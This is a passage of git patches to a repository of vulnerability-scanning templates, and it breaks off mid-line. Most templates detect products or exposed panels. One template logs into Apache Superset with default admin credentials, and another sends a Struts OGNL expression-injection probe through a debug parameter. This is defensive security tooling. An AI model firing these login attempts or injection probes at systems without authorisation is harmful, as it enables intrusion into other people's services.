19:09:06 +0530 Subject: [PATCH 0279/1415] Update CVE-2021-44451.yaml --- cves/2021/CVE-2021-44451.yaml | 47 ++++++++++++++++++----------------- 1 file changed, 24 insertions(+), 23 deletions(-) diff --git a/cves/2021/CVE-2021-44451.yaml b/cves/2021/CVE-2021-44451.yaml index a836701dfa..1d944fccd0 100644 --- a/cves/2021/CVE-2021-44451.yaml +++ b/cves/2021/CVE-2021-44451.yaml @@ -1,15 +1,15 @@ id: CVE-2021-44451 info: - name: Apache Superset Default Login + name: Apache Superset - Default Login author: dhiyaneshDK severity: medium - description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. + description: | + Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json - - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb - remediation: Users should upgrade to Apache Superset 1.4.0 or higher. + - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 @@ -25,17 +25,18 @@ requests: - | GET /login/ HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} - | POST /login/ HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login csrf_token={{csrf_token}}&username={{username}}&password={{password}} + - | + GET /dashboard/list/ HTTP/1.1 + Host: {{Hostname}} + attack: pitchfork payloads: username: @@ -43,25 +44,25 @@ requests: password: - admin + req-condition: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: header_2 + words: + - 'session' + + - type: word + part: body_3 + words: + - 'DashboardFilterStateRestApi' + extractors: - type: regex name: csrf_token group: 1 part: body - internal: true regex: - - 'value="(.*?)">' - - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'session' - - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/02 -# jkennedy 2022/10/30 Removed dupicate/erroneous match and verified on version 1.5.2 \ No newline at end of file + - 'name="csrf_token" type="hidden" value="(.*)"' + internal: true From b6ad399581370b7d55bc7aa27add0c0624e4583f Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 14 Nov 2022 17:20:23 +0100 Subject: [PATCH 0280/1415] Add tpl --- technologies/sogo-detect.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 technologies/sogo-detect.yaml diff --git a/technologies/sogo-detect.yaml b/technologies/sogo-detect.yaml new file mode 100644 index 0000000000..7a4bc008bb --- /dev/null +++ b/technologies/sogo-detect.yaml @@ -0,0 +1,33 @@ +id: sogo-detect + +info: + name: SOGo Detect + author: righettod + severity: info + description: With this template we can detect instance of the SOGo software. + reference: + - https://www.sogo.nu/ + metadata: + verified: true + shodan-query: http.title:"SOGo" + tags: sogo,tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'SOGo' + - 'SOGo Web Interface' + condition: or + + - type: status + status: + - 200 From c890f954d4f89a8c365c9b1ac9e47caa178e51a8 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Mon, 14 Nov 2022 11:29:01 -0500 Subject: [PATCH 0281/1415] Create docmosis-tornado-server.yaml --- misconfiguration/docmosis-tornado-server.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/docmosis-tornado-server.yaml diff --git a/misconfiguration/docmosis-tornado-server.yaml b/misconfiguration/docmosis-tornado-server.yaml new file mode 100644 index 0000000000..dfd8410f95 --- /dev/null +++ b/misconfiguration/docmosis-tornado-server.yaml @@ -0,0 +1,33 @@ +id: docmosis-tornado-server + +info: + name: Docmosis Tornado Server Exposure + author: tess + severity: medium + metadata: + verified: true + shodan-query: title:"Docmosis Tornado" + tags: misconfig,tornado,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Docmosis Tornado" + - 'href="WebServerDownload.css' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 916e132cae369659876661a15c3283bbb9e54423 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 14 Nov 2022 22:03:25 +0530 Subject: [PATCH 0282/1415] Update sogo-detect.yaml --- technologies/sogo-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/sogo-detect.yaml b/technologies/sogo-detect.yaml index 7a4bc008bb..07f4ba1d8b 100644 --- a/technologies/sogo-detect.yaml +++ b/technologies/sogo-detect.yaml @@ -4,7 +4,7 @@ info: name: SOGo Detect author: righettod severity: info - description: With this template we can detect instance of the SOGo software. + description: This template will detect a running SOGo instance reference: - https://www.sogo.nu/ metadata: @@ -26,7 +26,7 @@ requests: words: - 'SOGo' - 'SOGo Web Interface' - condition: or + condition: and - type: status status: From 48a6d6a6294598732fd46261f35edcace237385d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 14 Nov 2022 22:04:53 +0530 Subject: [PATCH 0283/1415] Update sogo-detect.yaml --- technologies/sogo-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/sogo-detect.yaml b/technologies/sogo-detect.yaml index 07f4ba1d8b..4c4526d53b 100644 --- a/technologies/sogo-detect.yaml +++ b/technologies/sogo-detect.yaml @@ -26,7 +26,7 @@ requests: words: - 'SOGo' - 'SOGo Web Interface' - condition: and + condition: or - type: status status: From 0dbd8a1bdac07dd6dd2e1b44681f19e7b46d042f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 14 Nov 2022 22:08:02 +0530 Subject: [PATCH 0284/1415] Update docmosis-tornado-server.yaml --- misconfiguration/docmosis-tornado-server.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/misconfiguration/docmosis-tornado-server.yaml b/misconfiguration/docmosis-tornado-server.yaml index dfd8410f95..8f733e3468 100644 --- a/misconfiguration/docmosis-tornado-server.yaml +++ b/misconfiguration/docmosis-tornado-server.yaml @@ -23,11 +23,6 @@ requests: - 'href="WebServerDownload.css' condition: and - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From dac02710bf03126e9be45701deafcc054886562f Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Mon, 14 Nov 2022 11:38:11 -0500 Subject: [PATCH 0285/1415] Create tornado-server-login.yaml --- technologies/tornado-server-login.yaml | 33 ++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 technologies/tornado-server-login.yaml diff --git a/technologies/tornado-server-login.yaml b/technologies/tornado-server-login.yaml new file mode 100644 index 0000000000..68e6df3c4d --- /dev/null +++ b/technologies/tornado-server-login.yaml @@ -0,0 +1,33 @@ +id: tornado-server-login + +info: + name: Tornado Server Panel + author: tess + severity: info + metadata: + verified: true + shodan-query: title:"Tornado - Login" + tags: detect,tornado,panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Welcome to Docmosis Tornado" + - "Please log in:" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 595aea328dff2f41dc4ace86c988a1109261d017 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 14 Nov 2022 22:08:25 +0530 Subject: [PATCH 0286/1415] Update docmosis-tornado-server.yaml --- misconfiguration/docmosis-tornado-server.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/docmosis-tornado-server.yaml b/misconfiguration/docmosis-tornado-server.yaml index 8f733e3468..cad69a694e 100644 --- a/misconfiguration/docmosis-tornado-server.yaml +++ b/misconfiguration/docmosis-tornado-server.yaml @@ -3,7 +3,7 @@ id: docmosis-tornado-server info: name: Docmosis Tornado Server Exposure author: tess - severity: medium + severity: low metadata: verified: true shodan-query: title:"Docmosis Tornado" From 4541a8409a25f0bf974c15fe175c3867896c6529 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 14 Nov 2022 16:40:28 +0000 Subject: [PATCH 0287/1415] Auto Generated New Template Addition List [Mon Nov 14 16:40:28 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index eb189d94fb..5d7df4d6a3 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ exposed-panels/opencpu-panel.yaml exposed-panels/tekton-dashboard.yaml exposed-panels/xibocms-login.yaml iot/pqube-power-analyzers.yaml +misconfiguration/docmosis-tornado-server.yaml network/detection/esmtp-detect.yaml network/detection/imap-detect.yaml network/detection/pop3-detect.yaml From e0ce20c86871a51feafe086cf54535cd69ad45c2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 14 Nov 2022 22:13:10 +0530 Subject: [PATCH 0288/1415] Update tornado-server-login.yaml --- technologies/tornado-server-login.yaml | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/technologies/tornado-server-login.yaml b/technologies/tornado-server-login.yaml index 68e6df3c4d..8da0d34bb8 100644 --- a/technologies/tornado-server-login.yaml +++ b/technologies/tornado-server-login.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"Tornado - Login" - tags: detect,tornado,panel + tags: panel,tornado requests: - method: GET @@ -23,11 +23,6 @@ requests: - "Please log in:" condition: and - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From a187f0a5f75b06dfc4772d410fb1678f1dabeeff Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 14 Nov 2022 16:53:03 +0000 Subject: [PATCH 0289/1415] Auto Generated New Template Addition List [Mon Nov 14 16:53:03 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5d7df4d6a3..49ce6f2fbf 100644 --- a/.new-additions +++ b/.new-additions @@ -8,4 +8,5 @@ misconfiguration/docmosis-tornado-server.yaml network/detection/esmtp-detect.yaml network/detection/imap-detect.yaml network/detection/pop3-detect.yaml +technologies/tornado-server-login.yaml vulnerabilities/opencpu/opencpu-rce.yaml From 99ba1d602d979a779bf052057f052fd15cc34af1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 14 Nov 2022 16:55:36 +0000 Subject: [PATCH 0290/1415] Auto Generated CVE annotations [Mon Nov 14 16:55:36 UTC 2022] :robot: --- cves/2022/CVE-2022-1442.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-1442.yaml b/cves/2022/CVE-2022-1442.yaml index 0470c2cdc3..6567b82312 100644 --- a/cves/2022/CVE-2022-1442.yaml +++ b/cves/2022/CVE-2022-1442.yaml @@ -12,11 +12,14 @@ info: - https://wordpress.org/plugins/metform/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1442 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2022-1442 + cwe-id: CWE-862 metadata: - verified: true google-dork: inurl:/wp-content/plugins/metform - tags: cve,cve2022,wordpress,wp-plugin,wp,disclosure,unauth,metform + verified: "true" + tags: wpscan,cve2022,wordpress,wp-plugin,disclosure,unauth,metform,cve,wp requests: - raw: From fe96d3aab6acbd4174e0f2bbbf5ae9b9429a991c Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Mon, 14 Nov 2022 11:59:04 -0500 Subject: [PATCH 0291/1415] Create typo3-exception-debug.yaml --- technologies/typo3-exception-debug.yaml | 33 +++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 technologies/typo3-exception-debug.yaml diff --git a/technologies/typo3-exception-debug.yaml b/technologies/typo3-exception-debug.yaml new file mode 100644 index 0000000000..859227bb2c --- /dev/null +++ b/technologies/typo3-exception-debug.yaml @@ -0,0 +1,33 @@ +id: typo3-exception-debug + +info: + name: TYPO3 Exception + author: tess + severity: info + metadata: + verified: true + shodan-query: http.title:"TYPO3 Exception" + tags: detect,typo3 + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "TYPO3 Exception" + - "Uncaught TYPO3 Exception" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 500 From 25a86a03f540e2ebe1defa53c3389f18c9bc15d2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 14 Nov 2022 22:35:20 +0530 Subject: [PATCH 0292/1415] Update and rename typo3-exception-debug.yaml to typo3-exception.yaml --- ...o3-exception-debug.yaml => typo3-exception.yaml} | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) rename technologies/{typo3-exception-debug.yaml => typo3-exception.yaml} (70%) diff --git a/technologies/typo3-exception-debug.yaml b/technologies/typo3-exception.yaml similarity index 70% rename from technologies/typo3-exception-debug.yaml rename to technologies/typo3-exception.yaml index 859227bb2c..33b22ef65e 100644 --- a/technologies/typo3-exception-debug.yaml +++ b/technologies/typo3-exception.yaml @@ -1,13 +1,13 @@ -id: typo3-exception-debug +id: typo3-exception info: name: TYPO3 Exception author: tess - severity: info + severity: low metadata: verified: true shodan-query: http.title:"TYPO3 Exception" - tags: detect,typo3 + tags: typo3,debug requests: - method: GET @@ -21,12 +21,7 @@ requests: words: - "TYPO3 Exception" - "Uncaught TYPO3 Exception" - condition: and - - - type: word - part: header - words: - - "text/html" + condition: or - type: status status: From 368a35ae930a6902fefbaaa42b751e78629aa64b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 14 Nov 2022 23:10:59 +0530 Subject: [PATCH 0293/1415] Update and rename technologies/typo3-exception.yaml to misconfiguration/typo3-debug-mode.yaml --- .../typo3-debug-mode.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename technologies/typo3-exception.yaml => misconfiguration/typo3-debug-mode.yaml (88%) diff --git a/technologies/typo3-exception.yaml b/misconfiguration/typo3-debug-mode.yaml similarity index 88% rename from technologies/typo3-exception.yaml rename to misconfiguration/typo3-debug-mode.yaml index 33b22ef65e..de4e75e824 100644 --- a/technologies/typo3-exception.yaml +++ b/misconfiguration/typo3-debug-mode.yaml @@ -1,7 +1,7 @@ -id: typo3-exception +id: typo3-debug-mode info: - name: TYPO3 Exception + name: TYPO3 Debug Mode Enabled author: tess severity: low metadata: From baf2d11531f49781650aeca7500918cb30a2ff0c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 14 Nov 2022 23:11:20 +0530 Subject: [PATCH 0294/1415] Update typo3-debug-mode.yaml --- misconfiguration/typo3-debug-mode.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/typo3-debug-mode.yaml b/misconfiguration/typo3-debug-mode.yaml index de4e75e824..4cf8e04b91 100644 --- a/misconfiguration/typo3-debug-mode.yaml +++ b/misconfiguration/typo3-debug-mode.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"TYPO3 Exception" - tags: typo3,debug + tags: typo3,debug,misconfig requests: - method: GET From c3e9af391609a166573ba056f629d9fe310abea7 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Mon, 14 Nov 2022 12:41:43 -0500 Subject: [PATCH 0295/1415] Create struts-dev-mode-ognl-injection.yaml --- .../struts-dev-mode-ognl-injection.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/struts-dev-mode-ognl-injection.yaml diff --git a/vulnerabilities/struts-dev-mode-ognl-injection.yaml b/vulnerabilities/struts-dev-mode-ognl-injection.yaml new file mode 100644 index 0000000000..0b7bfefc3a --- /dev/null +++ b/vulnerabilities/struts-dev-mode-ognl-injection.yaml @@ -0,0 +1,24 @@ +id: struts-dev-mode-ognl-injection + +info: + name: Apache Struts Dev Mode OGNL Injection + author: tess + severity: critical + reference: + - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/ + tags: struts,debug,ognl,exposure,apache + +requests: + - method: GET + path: + - '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{7*7}}' + + matchers-condition: and + matchers: + - type: word + words: + - '[[49]]' + + - type: status + status: + - 200 From 8b4fc618fc8a8beff659323f90722ad9f18db9b0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 14 Nov 2022 17:43:13 +0000 Subject: [PATCH 0296/1415] Auto Generated New Template Addition List [Mon Nov 14 17:43:13 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 49ce6f2fbf..e5adda1f3a 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ exposed-panels/tekton-dashboard.yaml exposed-panels/xibocms-login.yaml iot/pqube-power-analyzers.yaml misconfiguration/docmosis-tornado-server.yaml +misconfiguration/typo3-debug-mode.yaml network/detection/esmtp-detect.yaml network/detection/imap-detect.yaml network/detection/pop3-detect.yaml From a21e5edaf8cfd0a09c0b4cfd3283568f92bfbfc1 Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Mon, 14 Nov 2022 14:55:34 -0300 Subject: [PATCH 0297/1415] Update cisco-webvpn-detect.yaml --- exposed-panels/cisco/cisco-webvpn-detect.yaml | 16 ++++++---------- 1 file changed, 6 insertions(+), 10 deletions(-) diff --git a/exposed-panels/cisco/cisco-webvpn-detect.yaml b/exposed-panels/cisco/cisco-webvpn-detect.yaml index fa0d6dfd70..84077960c6 100644 --- a/exposed-panels/cisco/cisco-webvpn-detect.yaml +++ b/exposed-panels/cisco/cisco-webvpn-detect.yaml @@ -20,16 +20,6 @@ requests: - "{{BaseURL}}/webvpn.html" - "{{BaseURL}}" matchers: - - type: word - case-insensitive: true - condition: or - part: header - words: - - "webvpncontext" - - "CISCO" - - "AnyConnect" - - "SSL_Context" - - "WEBVPN" - type: word case-insensitive: true condition: or @@ -38,3 +28,9 @@ requests: - "CISCO" - "AnyConnect" - "SSLVPN Service" + - type: regex + part: header + condition: or + regex: + - "webvpncontext=00@.+" + - "webvpn=" From 0c51974f7a6b3eeaba36db545ce0946ac6edbe61 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 15 Nov 2022 00:59:05 +0530 Subject: [PATCH 0298/1415] Telnet Detection --- network/detection/telnet-detect.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 network/detection/telnet-detect.yaml diff --git a/network/detection/telnet-detect.yaml b/network/detection/telnet-detect.yaml new file mode 100644 index 0000000000..76ccf2090a --- /dev/null +++ b/network/detection/telnet-detect.yaml @@ -0,0 +1,26 @@ +id: telnet-detect + +info: + name: Telnet Detection + author: pussycat0x + severity: info + description: | + Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines. + metadata: + verified: true + shodan-query: port:23 telnet + tags: network,detect,telnet + +network: + + - inputs: + - data: "\n" + host: + - "{{Hostname}}" + - "{{Host}}:23" + matchers-condition: and + matchers: + - type: word + words: + - "Telnet" + - "Login authentication" From 24ff62297cdadf5c740073e9777f61b3ec656977 Mon Sep 17 00:00:00 2001 From: Thibault Soubiran Date: Mon, 14 Nov 2022 20:45:12 +0100 Subject: [PATCH 0299/1415] Fix tech tags in technologies folder --- technologies/adobe/adobe-coldfusion-detect.yaml | 2 +- technologies/adobe/adobe-coldfusion-error-detect.yaml | 2 +- technologies/angular-detect.yaml | 2 +- technologies/apollo-server-detect.yaml | 2 +- technologies/geo-webserver-detect.yaml | 2 +- technologies/hanwang-detect.yaml | 2 +- technologies/hp-blade-admin-detect.yaml | 2 +- technologies/json-server.yaml | 2 +- technologies/landesk/landesk-csa.yaml | 2 +- technologies/landesk/landesk-ma.yaml | 2 +- technologies/magento-detect.yaml | 2 +- technologies/magmi-detect.yaml | 2 +- technologies/microstrategy-detect.yaml | 2 +- technologies/osquery-fleet-detect.yaml | 2 +- technologies/roundcube-webmail-portal.yaml | 2 +- technologies/sap/sap-netweaver-detect.yaml | 2 +- technologies/sap/sap-netweaver-webgui.yaml | 2 +- technologies/sap/sap-web-dispatcher-admin-portal.yaml | 2 +- technologies/sap/sap-web-dispatcher.yaml | 2 +- technologies/snipeit-panel.yaml | 2 +- technologies/swag-instance-default-page.yaml | 2 +- technologies/telerik/telerik-dialoghandler-detect.yaml | 2 +- technologies/thinkcmf-detect.yaml | 2 +- technologies/vmware/vmware-site-recovery-manager.yaml | 2 +- technologies/vmware/vmware-vrealize-detect.yaml | 2 +- technologies/yeswiki-detect.yaml | 2 +- 26 files changed, 26 insertions(+), 26 deletions(-) diff --git a/technologies/adobe/adobe-coldfusion-detect.yaml b/technologies/adobe/adobe-coldfusion-detect.yaml index d81d7e018a..8ea80c7c4f 100644 --- a/technologies/adobe/adobe-coldfusion-detect.yaml +++ b/technologies/adobe/adobe-coldfusion-detect.yaml @@ -8,7 +8,7 @@ info: metadata: verified: true shodan-query: http.component:"Adobe ColdFusion" - tags: adobe,coldfusion + tags: adobe,coldfusion,tech requests: - method: GET diff --git a/technologies/adobe/adobe-coldfusion-error-detect.yaml b/technologies/adobe/adobe-coldfusion-error-detect.yaml index 57e6f15254..fe7b6c5d4f 100644 --- a/technologies/adobe/adobe-coldfusion-error-detect.yaml +++ b/technologies/adobe/adobe-coldfusion-error-detect.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true shodan-query: http.component:"Adobe ColdFusion" - tags: adobe,coldfusion + tags: adobe,coldfusion,tech requests: - method: GET diff --git a/technologies/angular-detect.yaml b/technologies/angular-detect.yaml index eb4ff9dc50..751e4ff138 100644 --- a/technologies/angular-detect.yaml +++ b/technologies/angular-detect.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true shodan-query: html:"ng-version=" - tags: technology,angular + tags: tech,angular requests: - method: GET diff --git a/technologies/apollo-server-detect.yaml b/technologies/apollo-server-detect.yaml index 18fc8f973f..592828ed54 100644 --- a/technologies/apollo-server-detect.yaml +++ b/technologies/apollo-server-detect.yaml @@ -7,7 +7,7 @@ info: description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL). reference: - https://github.com/apollographql/apollo-server - tags: apollo,detect,graphql + tags: apollo,detect,graphql,tech requests: - method: POST diff --git a/technologies/geo-webserver-detect.yaml b/technologies/geo-webserver-detect.yaml index b40fea0ef5..1fd3807b17 100644 --- a/technologies/geo-webserver-detect.yaml +++ b/technologies/geo-webserver-detect.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"GeoWebServer" - tags: panel,geowebserver + tags: panel,geowebserver,tech requests: - method: GET diff --git a/technologies/hanwang-detect.yaml b/technologies/hanwang-detect.yaml index 9e8cd0a27d..76a4712c20 100644 --- a/technologies/hanwang-detect.yaml +++ b/technologies/hanwang-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: fofa-query: 汉王人脸考勤管理系统 - tags: hanwang + tags: hanwang,tech requests: - method: GET diff --git a/technologies/hp-blade-admin-detect.yaml b/technologies/hp-blade-admin-detect.yaml index dd20eed05f..7df4434253 100644 --- a/technologies/hp-blade-admin-detect.yaml +++ b/technologies/hp-blade-admin-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: shodan-query: http.title:"HP BladeSystem" - tags: panel,hp + tags: panel,hp,tech requests: - method: GET diff --git a/technologies/json-server.yaml b/technologies/json-server.yaml index bf654027af..44cdfb796c 100644 --- a/technologies/json-server.yaml +++ b/technologies/json-server.yaml @@ -8,7 +8,7 @@ info: metadata: verified: true shodan-query: title:"JSON Server" - tags: exposure,devops + tags: exposure,devops,tech requests: - method: GET diff --git a/technologies/landesk/landesk-csa.yaml b/technologies/landesk/landesk-csa.yaml index 06661dcf6a..0860c09d0b 100644 --- a/technologies/landesk/landesk-csa.yaml +++ b/technologies/landesk/landesk-csa.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.html:"LANDESK(R)" - tags: technology,landesk + tags: tech,landesk requests: - method: GET diff --git a/technologies/landesk/landesk-ma.yaml b/technologies/landesk/landesk-ma.yaml index 9b8c53280b..a7022936c6 100644 --- a/technologies/landesk/landesk-ma.yaml +++ b/technologies/landesk/landesk-ma.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.html:"LANDESK(R)" - tags: technology,landesk + tags: tech,landesk requests: - method: GET diff --git a/technologies/magento-detect.yaml b/technologies/magento-detect.yaml index 89800e25b7..16b1e06e47 100644 --- a/technologies/magento-detect.yaml +++ b/technologies/magento-detect.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true shodan-query: http.component:"Magento" - tags: magento + tags: magento,tech requests: - method: GET diff --git a/technologies/magmi-detect.yaml b/technologies/magmi-detect.yaml index 6b05a730a4..e91a3c0c8b 100644 --- a/technologies/magmi-detect.yaml +++ b/technologies/magmi-detect.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.component:"Magento" - tags: magento,magmi,plugin + tags: magento,magmi,plugin,tech requests: - method: GET diff --git a/technologies/microstrategy-detect.yaml b/technologies/microstrategy-detect.yaml index e406938706..f534225b5a 100644 --- a/technologies/microstrategy-detect.yaml +++ b/technologies/microstrategy-detect.yaml @@ -5,7 +5,7 @@ info: author: philippedelteil,Retr02332 severity: info description: Detect if MicroStrategy instances exist in your URLS - tags: microstrategy,panel + tags: microstrategy,panel,tech requests: - method: GET diff --git a/technologies/osquery-fleet-detect.yaml b/technologies/osquery-fleet-detect.yaml index db1f2c333f..5c57fdc01d 100644 --- a/technologies/osquery-fleet-detect.yaml +++ b/technologies/osquery-fleet-detect.yaml @@ -8,7 +8,7 @@ info: - https://fleetdm.com/ metadata: shodan-query: http.favicon.hash:-1529860313 - tags: panel,fleet,osquery + tags: panel,fleet,osquery,tech requests: - method: GET diff --git a/technologies/roundcube-webmail-portal.yaml b/technologies/roundcube-webmail-portal.yaml index db7f0add9a..3093c18203 100644 --- a/technologies/roundcube-webmail-portal.yaml +++ b/technologies/roundcube-webmail-portal.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: shodan-query: http.component:"RoundCube" - tags: roundcube,portal + tags: roundcube,portal,tech requests: - method: GET diff --git a/technologies/sap/sap-netweaver-detect.yaml b/technologies/sap/sap-netweaver-detect.yaml index 6474d827d4..c28e1d3cc4 100644 --- a/technologies/sap/sap-netweaver-detect.yaml +++ b/technologies/sap/sap-netweaver-detect.yaml @@ -7,7 +7,7 @@ info: description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) metadata: shodan-query: http.favicon.hash:-266008933 - tags: sap,webserver + tags: sap,webserver,tech requests: - method: GET diff --git a/technologies/sap/sap-netweaver-webgui.yaml b/technologies/sap/sap-netweaver-webgui.yaml index a6b36c116c..661f9400f2 100644 --- a/technologies/sap/sap-netweaver-webgui.yaml +++ b/technologies/sap/sap-netweaver-webgui.yaml @@ -5,7 +5,7 @@ info: author: randomstr1ng severity: info description: Detection of SAP NetWeaver ABAP Webserver WebGUI - tags: sap,webserver + tags: sap,webserver,tech requests: - method: GET diff --git a/technologies/sap/sap-web-dispatcher-admin-portal.yaml b/technologies/sap/sap-web-dispatcher-admin-portal.yaml index 02a39def37..7682de4a9a 100644 --- a/technologies/sap/sap-web-dispatcher-admin-portal.yaml +++ b/technologies/sap/sap-web-dispatcher-admin-portal.yaml @@ -7,7 +7,7 @@ info: description: Detection of SAP Web Dispatcher Admin Portal metadata: shodan-query: http.favicon.hash:-266008933 - tags: sap,webserver,proxy + tags: sap,webserver,proxy,tech requests: - method: GET diff --git a/technologies/sap/sap-web-dispatcher.yaml b/technologies/sap/sap-web-dispatcher.yaml index dc69736917..f5825cade2 100644 --- a/technologies/sap/sap-web-dispatcher.yaml +++ b/technologies/sap/sap-web-dispatcher.yaml @@ -5,7 +5,7 @@ info: author: randomstr1ng severity: info description: Detection of SAP Web Dispatcher service - tags: sap,webserver,proxy + tags: sap,webserver,proxy,tech requests: - method: GET diff --git a/technologies/snipeit-panel.yaml b/technologies/snipeit-panel.yaml index 756fb6078d..88f9aee913 100644 --- a/technologies/snipeit-panel.yaml +++ b/technologies/snipeit-panel.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: shodan-query: http.favicon.hash:431627549 - tags: panel,snipeit + tags: panel,snipeit,tech requests: - method: GET diff --git a/technologies/swag-instance-default-page.yaml b/technologies/swag-instance-default-page.yaml index edc59464ab..c239e5eb15 100644 --- a/technologies/swag-instance-default-page.yaml +++ b/technologies/swag-instance-default-page.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"Welcome to your SWAG instance" - tags: panel + tags: panel,tech requests: - method: GET diff --git a/technologies/telerik/telerik-dialoghandler-detect.yaml b/technologies/telerik/telerik-dialoghandler-detect.yaml index 4a197d50e0..4c626fe6f1 100644 --- a/technologies/telerik/telerik-dialoghandler-detect.yaml +++ b/technologies/telerik/telerik-dialoghandler-detect.yaml @@ -8,7 +8,7 @@ info: reference: - https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html - https://github.com/bao7uo/dp_crypto - tags: telerik,asp + tags: 